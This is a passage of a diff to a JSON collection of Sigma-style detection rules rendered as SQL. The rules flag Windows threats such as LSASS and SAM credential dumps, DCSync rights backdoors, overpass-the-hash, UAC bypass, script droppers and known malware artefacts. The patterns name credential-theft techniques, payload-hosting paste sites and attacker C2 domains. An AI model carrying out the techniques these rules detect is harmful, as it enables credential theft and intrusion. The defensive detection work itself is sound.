"63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "status": "experimental", + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_lsass_dump.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.defense_evasion", + "attack.t1105" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "status": "experimental", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "title": "Potential SAM Database Dump", + "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "attack.credential_access", + "attack.t1003.002" ], - "filename": "win_terminalservices_rdp_ngrok.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" + "Rare cases of administrative activity" ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" - }, - { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_sam_dump.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "description": "Detects windows executables that writes files with suspicious extensions", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" - ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" - }, - { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" ], - "filename": "win_codeintegrity_revoked_driver.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", - "status": "experimental", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Antivirus products" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "status": "test", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" ], - "filename": "win_codeintegrity_blocked_driver_load.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", + "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.command_and_control", - "attack.t1071" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + 